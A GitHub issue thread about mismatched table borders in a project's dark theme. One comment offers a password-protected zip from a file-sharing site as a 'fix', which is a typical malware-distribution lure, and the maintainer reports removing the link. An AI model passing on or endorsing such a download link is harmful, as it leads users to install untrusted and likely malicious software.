### ISSUE TITLE
[Bug] [2.0] Fix visual bugs on archived websites page (for dark theme)

### ISSUE THREAD

**Issue by GoosiferIO** [GoosiferIO/zooberry#22]
Currently on the dark theme the table generated for the list of archived websites has widely-contrasting borders that don't match up with the rest of the theme. Previously I found it to be inherently an issue with HTML tables and couldn't style it away, so investigating an alternative might be necessary. It's possible there's some just some bad CSS somewhere.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by GoosiferIO** [comment]
Hi, thanks for the feedback. I removed your mediafire link out of caution. I'd appreciate any offer for contributions to be strictly on Github either through usual means of PR or in a codeblock. :)
